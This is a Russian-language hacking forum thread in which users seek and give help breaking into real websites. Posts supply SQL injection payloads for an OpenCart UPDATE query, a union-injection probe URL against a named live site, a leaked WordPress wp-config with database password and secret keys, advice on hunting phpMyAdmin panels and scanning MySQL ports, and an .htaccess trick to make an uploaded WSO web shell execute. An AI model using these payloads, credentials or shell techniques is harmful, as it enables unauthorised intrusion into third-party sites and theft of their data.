Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    Привет всем, не знаете, в какой таблице хранится url адрес сайта в Drupal?
     
  2. Forserer

    Forserer New Member

    Joined:
    16 Aug 2015
    Messages:
    58
    Likes Received:
    2
    Reputations:
    0
    Добрый день, в форме которая отправляется на сервер ajax запросом если добавить одинарную кавычку в нике в ответе вываливает такая ошибка, установлен openCart.
    Code:
    Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1991-01-01' WHERE customer_id = 687013' at line 2
    Error No: 1064
    UPDATE oc_customer SET fio = 'Имя Фамилия', firstname = 'Имя', lastname = 'Фамилия', telephone = '11111111111', patronymic = '', nickname = ''', birthday = '1991-01-01' WHERE customer_id = 687013
    Возможно ли как то провести sql иньекцию? Проблема в том что если запрос выполнится без ошибок в ответе будет json объект который вернет что то типа {"status":"ok"}

    Попытался просто видоизменить конец запроса, но комментарий -- # /* не отрабатывает
    тоже вываливается в ошибку

    [​IMG]
     
    #2882 Forserer, 4 Nov 2020
    Last edited: 4 Nov 2020
  3. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    Вы можете попробовать
    Code:
    nickname=',birthday=(SELECT IF(0=1,'2020-02-20','1111-11-11')) WHERE customer_id=687013;-- 
    и если скуля срабатывает, то как дата рождения будет стоять "1111-11-11", потом уже можно будет делать блайнд с задержнкой или данные в дату рождения записывать, в обшем пару вариантов есть.
     
    Baskin-Robbins and crlf like this.
  4. Forserer

    Forserer New Member

    Joined:
    16 Aug 2015
    Messages:
    58
    Likes Received:
    2
    Reputations:
    0
    забыл сказать что ник имеет ограничение на количество символов поэтому там не пройдет такой вариант точно, но вот в дате ограничения видимо нет, попробовал в ней все равно так же ругается:(
    [​IMG]
     
  5. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    попробуйте в конце
    Code:
    ;-- а
    так что-бы между двумя минусами и а был пробел. может быть что перед передачей в параметрах отрезают с помощью trim пробелы в конце. а два минуса без пробела, это как два ноля без единицы -- ничто :D А так если в конце параметра будет стоять что-то кроме пробела, то трим не срабатывает и пробел остаётся в параметре, который идёт в скуль.
     
  6. Forserer

    Forserer New Member

    Joined:
    16 Aug 2015
    Messages:
    58
    Likes Received:
    2
    Reputations:
    0
    [​IMG]
    что то не понимаю почему комментирование не срабатывает
     
  7. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    Попробуйте добавить одинарную кавычку в конце
    Code:
    ;-- а'
     
  8. Forserer

    Forserer New Member

    Joined:
    16 Aug 2015
    Messages:
    58
    Likes Received:
    2
    Reputations:
    0
    кавычка добавляется в запрос но ошибка та же самая, как будто комментарий не распространяется именно на выражение WHERE customer_id = 687013, если оно находится на другой строке или это не важно в данном случае?
     
  9. Forserer

    Forserer New Member

    Joined:
    16 Aug 2015
    Messages:
    58
    Likes Received:
    2
    Reputations:
    0
    так, а как доработать вот такой запрос для получения какой либо инфы через UNION
    Code:
    SELECT h.* From oc_help h LEFT JOIN `oc_help_to_blog` htb USING (help_id) WHERE htb.blog_id = 4612
     
  10. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    На скрине видна ошибка только в случае многострочного комментария, который должен быть закрыт по спецификации синтаксиса.

    Не вижу проблем, почему нельзя использовать lastname ещё раз и просто вклиниться в запрос не прибегая к комментированию, примерно таким образом:
    Code:
    xxx', lastname = @@version, firstname = 'xxx
    
    При этом превое значение lastname должно быть проигнорировано.

    Маны по MySQLi вам в помощь:

    https://forum.antichat.ru//threads/43966/
    https://rdot.org/forum/showthread.php?t=124
    https://rdot.org/forum/showthread.php?t=60

    Не стоит брезговать, по причине давних дат публикации материалов, с тех времён кардинально ничего не поменялось. В случае непоняток, всегда можно уточнить здесь, а не просить раскручивать за ваc простейшие инъекции в запросах выборки.
     
    CyberTro1n, dmax0fw, Forserer and 3 others like this.
  11. Forserer

    Forserer New Member

    Joined:
    16 Aug 2015
    Messages:
    58
    Likes Received:
    2
    Reputations:
    0
    В таком запросе получилось только через ошибку вывести данные, прямого вывода на страницу нету видимо, но в таком запросе не получится сделать через ошибку INSERT или UPDATE ?

    Такой вариант не работает. База 10.3.9-MariaDB
    Code:
    SELECT h.* From oc_help h LEFT JOIN `oc_help_to_blog` htb USING (help_id) WHERE htb.blog_id = 4612; UPDATE ...
     
  12. anton liga

    anton liga Member

    Joined:
    19 Jun 2011
    Messages:
    46
    Likes Received:
    16
    Reputations:
    0
    Парни,привет! есть вот такая инфа,подскажите пожалуйста и если можно,то прям тыкните носом в строчки,что можно с этим сделать?
    если я правильно понимаю,то это ключи от БД логином и паролем..как это можно использовать и через какие проги..у меня на уме только бурп..

    <?php
    /**
    * The base configurations of the WordPress.
    *
    * This file has the following configurations: MySQL settings, Table Prefix,
    * Secret Keys, WordPress Language, and ABSPATH. You can find more information
    * by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
    * wp-config.php} Codex page. You can get the MySQL settings from your web host.
    *
    * This file is used by the wp-config.php creation script during the
    * installation. You don't have to use the web site, you can just copy this file
    * to "wp-config.php" and fill in the values.
    *
    * @package WordPress
    */
    // ** MySQL settings - You can get this info from your web host ** //
    /** The name of the database for WordPress */
    define('DB_NAME', 'rtik_wke58w5ehjrkew5u');
    /** MySQL database username */
    define('DB_USER', 'rtik_cucok507');
    /** MySQL database password */
    define('DB_PASSWORD', 'dkjfy538i235rkewnfkwe57j56');
    /** MySQL hostname */
    define('DB_HOST', 'localhost');
    /** Database Charset to use in creating database tables. */
    define('DB_CHARSET', 'utf8');
    /** The Database Collate type. Don't change this if in doubt. */
    define('DB_COLLATE', '');
    /**#@+
    * Authentication Unique Keys and Salts.
    *
    * Change these to different unique phrases!
    * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
    * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
    *
    * @since 2.6.0
    */
    define('AUTH_KEY', 'SGH@u|Wah 2I)dkdH<LbZ)}tR!LYi![cibC^9F,r}hu1C860 =A.NN]0A%|D^.ly');
    define('SECURE_AUTH_KEY', '<X/WbexPH 2UaC,@gO3kgptZJ0)A8C,3JmxGE3|e(jUIOZ<0)W(5xg>nRe]EhlT[');
    define('LOGGED_IN_KEY', '?@]WrjTLAChQ}ndj}r%6ry`9{>naV,`%`&9!Lm{}wa@PY^Y=f@)QExv1mM]X6Lkk');
    define('NONCE_KEY', 'J$+y?FTAc@D6)?w j!(cy&Uw|A!((@?gz^ xj{9jLlI3X-p*J!-1)Qc$h/fxhR>N');
    define('AUTH_SALT', 'uc8K{*v$8{V?}hqlwjbJabr+ cYSv[N=wU0qooX]QdG^R?BTL{xSU&WD+oefQ:K;');
    define('SECURE_AUTH_SALT', 'Hi+|oN@oSZ*n}O4L-bB&pr:5 ;$;HjMX!RQf}Vv*1J R|5e~-SKjINvPbbL#q6D,');
    define('LOGGED_IN_SALT', '4pQD.YnB~dbh-vC4xW}.L@`Km_{uC+<=o({H-E,pmYz-;QBlUuCUoHmXENVW@87i');
    define('NONCE_SALT', 't9K+v!9YIudIOYa~Bk-%8[wgJicn&} H+Z+d4bFLeA--$dYg_#pa*Ut6)eb57~u');
    /**#@-*/
    /**
    * WordPress Database Table prefix.
    *
    * You can have multiple installations in one database if you give each a unique
    * prefix. Only numbers, letters, and underscores please!
    */
    $table_prefix = 'dwjye760_';
    /**
    * WordPress Localized Language, defaults to English.
    *
    * Change this to localize WordPress. A corresponding MO file for the chosen
    * language must be installed to wp-content/languages. For example, install
    * de_DE.mo to wp-content/languages and set WPLANG to 'de_DE' to enable German
    * language support.
    */
    define('WPLANG', 'id_ID');
    /**
    */
    define('BBLANG', 'id_ID');
    /**
    * For developers: WordPress debugging mode.
    *
    * Change this to true to enable the display of notices during development.
    * It is strongly recommended that plugin and theme developers use WP_DEBUG
    * in their development environments.
    */

    /* Bahasa Indonesia Forum */
    /*define ('BBLANG', 'id_ID');*/

    define('WP_DEBUG', false);
    /* That's all, stop editing! Happy blogging. */
    /** Absolute path to the WordPress directory. */
    if ( !defined('ABSPATH') )
    define('ABSPATH', dirname(__FILE__) . '/');
    /** Sets up WordPress vars and included files. */
    /**Cron-WP*/
    define('DISABLE_WP_CRON', true);
    require_once(ABSPATH . 'wp-settings.php');
    //script menyembunyikan error kepada user
    ini_set("display_errors", 0);
    error_reporting(0);
     
  13. aberkroft

    aberkroft Member

    Joined:
    9 Feb 2020
    Messages:
    43
    Likes Received:
    14
    Reputations:
    3
    Любым mysql-клиентом к базе подключиться, однако сдается мне, что mysql-сервер слушает только на localhost, а доступа к этому самому localhost Вы не имеете.
     
    anton liga likes this.
  14. d_dwacawaca

    d_dwacawaca Member

    Joined:
    4 Jan 2021
    Messages:
    37
    Likes Received:
    7
    Reputations:
    0
    Посмотри соседей сайта, может где-то сможешь залиться и подключиться.
    Поищи на сайте phmyadmin,adminer, etc.
     
    Baskin-Robbins likes this.
  15. lifescore

    lifescore Elder - Старейшина

    Joined:
    27 Aug 2011
    Messages:
    651
    Likes Received:
    511
    Reputations:
    72
    Этим данным уже лет 7+
     
    erwerr2321 likes this.
  16. lifescore

    lifescore Elder - Старейшина

    Joined:
    27 Aug 2011
    Messages:
    651
    Likes Received:
    511
    Reputations:
    72
    Если db_host = localhost
    Проверяем интересуемые порт(ы) служб на доступность + возможность коннекта
    Code:
    sudo nmap -v -v -sS -Pn -p3306 0.0.0.0
    Если порты закрыты или ограничены для подключения, отправляемся на поиске панельки.
    В 90% залетаем на ура, если имеем актуальные кредсы и панельку управления СУБД.

    Ищем директории phpmyadmin/pma/phpadmin, adminer.php и так далее в разных вариациях.

    Экономим время путем установки хостера и дефолт путей/конфигов данных хостеров:
    Code:
    Хостинг-провайдер    Значение DB_HOST
    1and1            db12345678
    AN Hosting        localhost
    A Small Orange        localhost
    BlueHost        localhost
    DreamHost        mysql.example.com
    GoDaddy            h41mysql52.secureserver.net
    HostGator        localhost
    HostICan        localhost
    ICDSoft            localhost:/tmp/mysql5.sock
    LaughingSquid        localhost
    MediaTemple/Grid    internal-db.s44441.gridserver.com
    one.com            localhost
    pair Networks        dbnnnx.pair.com
    Rackspace Cloud        mysql50-01.wc1.dfw1.stabletransit.com
    Yahoo            mysql
    Сервера с cPanel    localhost
    Сервера с Plesk        localhost
    Сервера с DirectAdmin    localhost
    Tophost.it        sql.your-domain-name.it
    Sprinthost.ru        localhost
    

     
  17. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Help
    Code:
    https://www.castagniccia-maremonti.com/index.php?id=26+order+by+7+--+&type_page=detail_affaires
     
  18. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
     
    _________________________
    #2898 winstrool, 5 Feb 2021
    Last edited: 5 Feb 2021
  19. polzunki

    polzunki New Member

    Joined:
    28 Jul 2020
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
    Доброго времени всем. Подскажите пожалуйста по не скольким вопросам. Есть сайт. Из админки есть возможность делать импорт в базу данных.
    Возможно ли как-то получить шелл? Пути не известны.
    Так же есть возможность загружать файлы, но в чистом виде .php файл грузиться не хочет.
    Переименовав к примеру в .php3 загрузка происходит. С добавлением рандомного имени в конце.
    Пример: wso.php3.53aadaa50075c72420b8656f14b0b68c
    При переходе по ссылке, шелл не отображается, а происходит скачивание.
    С этим можно что-то сделать? Заранее благодарен.
     
  20. lifescore

    lifescore Elder - Старейшина

    Joined:
    27 Aug 2011
    Messages:
    651
    Likes Received:
    511
    Reputations:
    72
    конечно, импорт бд - добавляем учетку + привилегии путем импорта юзера или замены. Выолнить подобное на уровне mysql маровероятно, с давних версий по дефолту ограничена скуля с работой в файловой. Если конечно речь об mysql

    по аплоуду попробуй в случае апача .htaccess пропиши с расширением уже залитого файла выполнять как скрипт
    Code:
    <FilesMatch ".php3.53aadaa50075c72420b8656f14b0b68c">
    SetHandler application/x-httpd-php
    </FilesMatch>
    определяй где выполняется проверка (клаинт сайд/сервер сайд), байпасы не только на одном расширении заканчивается. Проще всего посмотреть вендра данного "чуда" и сбегать на сплойт-дб